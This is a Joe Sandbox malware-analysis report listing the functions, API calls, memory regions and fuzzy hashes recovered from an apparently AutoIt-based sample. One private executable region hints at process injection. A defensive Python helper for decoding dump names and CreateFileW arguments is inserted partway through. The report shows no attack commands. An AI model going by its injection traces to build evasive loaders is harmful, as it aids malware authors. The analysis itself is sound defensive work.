                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                                      • String ID:
                                                                      • API String ID: 2279764990-0
                                                                      • Opcode ID: 8cb3a0646580fe20a3404e70feb335aec329272b7bc714430c7aa4b5ab01b8c9
                                                                      • Instruction ID: 963ee345e8aa5de489cd7c5446cdb1ace35cbdd1f58e07b70b7413edc8544d49
                                                                      • Opcode Fuzzy Hash: 8cb3a0646580fe20a3404e70feb335aec329272b7bc714430c7aa4b5ab01b8c9
                                                                      • Instruction Fuzzy Hash: 82113A33A001219B9B31DE59DC80B6EF3D5DB80B6071601A1FD16AB356E731DE0197D2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA5773
                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00BE4052
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID:
                                                                      • API String ID: 823142352-0
                                                                      • Opcode ID: 6fdfb26b1bc2292163461306a72657756f5b4a4387779270b20af95f100ff048
                                                                      • Instruction ID: bf1bfa340039808c59cde64d71eba973d2a55c605bf283d96eabdb58cccce3c2
                                                                      • Opcode Fuzzy Hash: 6fdfb26b1bc2292163461306a72657756f5b4a4387779270b20af95f100ff048
                                                                      • Instruction Fuzzy Hash: 80019230145225B6E7310A2ACC4EF9B7F98EF027B0F108350BA9C6A1E1CBB45954DB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
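Added example, not Joe Sandbox's code and not part of this report: a small Python helper for reading two things in the function listing above by machine rather than by eye. It decodes the protection and memory-type fields of the .sdmp dump names (the field order is an assumption inferred from the names in this report; the numeric constants are Windows' own from winnt.h and fileapi.h) and the argument vectors of the captured CreateFileW calls. Run on the names and calls copied from this page it flags the 00110000 region (PAGE_EXECUTE_READWRITE, MEM_PRIVATE, "based on PE: false"), which also hosts the recorded CreateProcessW, as private RWX memory, and shows the second CreateFileW (GENERIC_READ|GENERIC_WRITE, OPEN_ALWAYS) as the only one able to create a file.

```python
import re

# Win32 constants from winnt.h / fileapi.h (fixed values, not assumptions).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# Assumed field layout of a Joe Sandbox .sdmp name, inferred from the names in this
# report (assumption): <proc>.<snapshot>.<id>.<base>.<protect>.<state>.<type>.<n>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<id>[0-9A-Fa-f]+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<n>[0-9A-Fa-f]{8})\.sdmp$"
)
# One "APIs" line of the report: Api.Module(arg,arg,...), ref: <call site>
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)


def flag_names(value, table):
    """Render a bit mask as OR-ed constant names ("0" when no bit is set)."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else "0"


def classify_dump(name):
    """Decode the protection/type fields of a dump name and flag private RWX memory."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError("not a Joe Sandbox dump name: %r" % name)
    protect = int(m["protect"], 16)
    mem_type = int(m["type"], 16)
    return {
        "proc_index": int(m["proc"], 16),
        "base": int(m["base"], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "type": MEM_TYPE.get(mem_type, hex(mem_type)),
        # Executable and writable memory not backed by an image (MEM_PRIVATE) is the
        # usual footprint of injected code or unpacked shellcode.
        "private_rwx": mem_type == 0x20000 and bool(protect & 0x40),
    }


def parse_call(line):
    """Split one captured API line into name, module, integer args and call site."""
    m = CALL_RE.match(line.strip().lstrip("• ").strip())
    if m is None:
        raise ValueError("unrecognised API line: %r" % line)
    # "?" marks an argument the sandbox could not resolve; keep it verbatim.
    args = [a if a == "?" else int(a, 16) for a in m["args"].split(",") if a != ""]
    return {"api": m["api"], "module": m["module"], "args": args, "ref": m["ref"]}


def decode_create_file(line):
    """Turn a captured CreateFileW call into symbolic access/share/disposition."""
    call = parse_call(line)
    if call["api"] != "CreateFileW" or len(call["args"]) != 7:
        raise ValueError("not a 7-argument CreateFileW call")
    _name, access, share, _sec, disposition, _attrs, _template = call["args"]
    return {
        "ref": call["ref"],
        "access": flag_names(access, GENERIC),
        "share": flag_names(share, SHARE),
        "disposition": DISPOSITION.get(disposition, hex(disposition)),
        # CREATE_NEW / CREATE_ALWAYS / OPEN_ALWAYS can create a file: a drop candidate.
        "may_create": disposition in (1, 2, 4),
    }


if __name__ == "__main__":
    # Dump names and API lines copied from this report's function listing.
    for dump in ("00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp",
                 "00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp"):
        print(classify_dump(dump))
    for call in ("CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00BA5773",
                 "CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00BE4052"):
        print(decode_create_file(call))
```

The "state" field of the dump name is kept raw on purpose: it reads 00000001 for the image region and 00001000 for the private one, so it is not simply the MEM_COMMIT state value and its meaning is not confirmed by this page.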

                                                                      APIs
                                                                        • Part of subcall function 00BC3600: try_get_function.LIBVCRUNTIME ref: 00BC3615
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC3432
                                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00BC343D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                      • String ID:
                                                                      • API String ID: 806969131-0
                                                                      • Opcode ID: 0c8d5f75b46f88726a22c1af23f960b25181e8ca8dc1befe2ccd0993f8dfe1cb
                                                                      • Instruction ID: 17d87b6c5c0cb720182e0438f74e26a64d10cd20a1cdfa4d8c5b74871726cef0
                                                                      • Opcode Fuzzy Hash: 0c8d5f75b46f88726a22c1af23f960b25181e8ca8dc1befe2ccd0993f8dfe1cb
                                                                      • Instruction Fuzzy Hash: 15D0A93060C301A90C1D2AB438A3FA913C08841F793E0D2EEE820C93C2EB658301391A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 00BABB4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: e49765f197c58437060dcd2cacadc815b83cbbba65aa483efe821f6b5e1db7f1
                                                                      • Instruction ID: 74c19c669a48111007ee22fb4f9ca87e4cb4d491bc380a68d5d3dc17fcdfd8b0
                                                                      • Opcode Fuzzy Hash: e49765f197c58437060dcd2cacadc815b83cbbba65aa483efe821f6b5e1db7f1
                                                                      • Instruction Fuzzy Hash: 4932AD34A082099FDB10DF54C894FBEB7F9EF46310F148099EA25AB262D774ED85CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,00000000), ref: 00111B2D
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00111B73
                                                                      • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00111E7C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457787818.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_110000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateMemoryReadTerminate
                                                                      • String ID:
                                                                      • API String ID: 2831168122-0
                                                                      • Opcode ID: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
                                                                      • Instruction ID: b5f370da5cf87ca1dfbddf7dad2beb3468161fc58d65392719ffb8c1830ee061
                                                                      • Opcode Fuzzy Hash: b327fbffe67f088a8ec06bc3364a8d9e1395271827ab643009cfd88a26bb8519
                                                                      • Instruction Fuzzy Hash: 7F12CE24E24658C6EB24DF64D8507DEB232FF68300F1091E9910DEB7A5E77A4F81CB5A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E9C
                                                                        • Part of subcall function 00BA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EAE
                                                                        • Part of subcall function 00BA4E90: FreeLibrary.KERNEL32(00000000,?,?,00BA4EDD,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EC0
                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                                        • Part of subcall function 00BA4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00BA4E62
                                                                        • Part of subcall function 00BA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E74
                                                                        • Part of subcall function 00BA4E59: FreeLibrary.KERNEL32(00000000,?,?,00BE3CDE,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4E87
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressFreeProc
                                                                      • String ID:
                                                                      • API String ID: 2632591731-0
                                                                      • Opcode ID: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                                      • Instruction ID: 8e6407d895ed4c02fcbd2f57bb7480d1008f0a7fafd578079af00bfac09529d9
                                                                      • Opcode Fuzzy Hash: 9335f787675ea644e025526f3b651b90fbab8db183f0c7752fabe467f171b803
                                                                      • Instruction Fuzzy Hash: 46110132618205AACB24AB60DC42FED77E4AF81B10F2084ADF456B61C1EFB1EA049750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __wsopen_s
                                                                      • String ID:
                                                                      • API String ID: 3347428461-0
                                                                      • Opcode ID: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                                      • Instruction ID: a6736b1b8189ca2027441526837aacce89d638ad8d93be51d880dbf9cb11cfb4
                                                                      • Opcode Fuzzy Hash: 289625f387150c380de3b1124fda8b40cd4b4d0077313bfcb0522dba657b4a0c
                                                                      • Instruction Fuzzy Hash: 5B11187590410AAFCB05DF58E941A9EBBF5EF48315F10409AF808AB312EB31EA11CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 00BA9A9C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                                      • Instruction ID: 132e2352af4a6742c572d085a6bbd15dcd16b2205974e78199341ac7fa8ae82e
                                                                      • Opcode Fuzzy Hash: 53cd387e20cc0ad84c4ee7a0e768ad6c5db2a1a546e13cd2c4b2362cee6f5992
                                                                      • Instruction Fuzzy Hash: 7B114832208B059FD720CF15C880B66B7F9EF45764F10C46EE9AB8AA51C770F945EB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BD4C7D: RtlAllocateHeap.NTDLL(00000008,00BA1129,00000000,?,00BD2E29,00000001,00000364,?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?), ref: 00BD4CBE
                                                                      • _free.LIBCMT ref: 00BD506C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_free
                                                                      • String ID:
                                                                      • API String ID: 614378929-0
                                                                      • Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                      • Instruction ID: 06897c56f09b379ec772387a3132fd9589e601086871614e9f68adb450282985
                                                                      • Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
                                                                      • Instruction Fuzzy Hash: DF0126722047046BE3318F659881A5AFBECFB89370F25056EE18483380FA30A805C6B4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __alldvrm
                                                                      • String ID:
                                                                      • API String ID: 65215352-0
                                                                      • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                      • Instruction ID: d9ba2ffd78fd357dd42ca84b7c1766f858f7460c862b8ecd6eddf3bd2a2664d8
                                                                      • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                      • Instruction Fuzzy Hash: FA015E71910308EAEB289FA4CD46BAEB6E8EB40724F5185AEE416D7200D675DE00C765
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                                      • Instruction ID: 8fa45faa1acfc3a790a104d441f2be8ecb1f430999cbf6bab9cfffb3cfd8efc4
                                                                      • Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
                                                                      • Instruction Fuzzy Hash: 49F0D136521A10D6C6312A799C05F5A73DC9F62331F1007FEF431962D2EB74E80186A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,00BA1129,00000000,?,00BD2E29,00000001,00000364,?,?,?,00BCF2DE,00BD3863,00C71444,?,00BBFDF5,?), ref: 00BD4CBE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 37fa20e65d27263c0709b68f24d72001ae41873f2a567236bef65a9384bf6455
                                                                      • Instruction ID: 6d20ef04aba526be425b8ea9cd8f3fe9f09426a01c2ecb33a51ad2bf0f945f82
                                                                      • Opcode Fuzzy Hash: 37fa20e65d27263c0709b68f24d72001ae41873f2a567236bef65a9384bf6455
                                                                      • Instruction Fuzzy Hash: F1F0E231622224A7DB215F629C09F5FB7C9FF517A1B1D41EBFC19AA390EB70D80196E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                                      • Instruction ID: d19fa98aff6c437292b558cb8e5c1af4a9c25df0d1667f0b69002c638c3dbce3
                                                                      • Opcode Fuzzy Hash: 9c5f78b3427383a38971572370fc9e293e072ed864d10e9fe537db0d597398e6
                                                                      • Instruction Fuzzy Hash: 40E0E53120062596D72126669C00F9EBACAEB42FB0F0900E6BC0496692FB52DE01A3E2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BD4D9C
                                                                        • Part of subcall function 00BD29C8: HeapFree.KERNEL32(00000000,00000000), ref: 00BD29DE
                                                                        • Part of subcall function 00BD29C8: GetLastError.KERNEL32(00000000,?,00BDD7D1,00000000,00000000,00000000,00000000,?,00BDD7F8,00000000,00000007,00000000,?,00BDDBF5,00000000,00000000), ref: 00BD29F0
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFreeHeapLast_free
                                                                      • String ID:
                                                                      • API String ID: 1353095263-0
                                                                      • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                      • Instruction ID: 6a98eed5da04092eb02a694fb9b90e83bdac62cc572db4118c5335e298d8b4ad
                                                                      • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                      • Instruction Fuzzy Hash: 85E092361003059F8720CF6CD400A82F7F5EF94320720853AE89DE3310E331E812CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4F6D
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
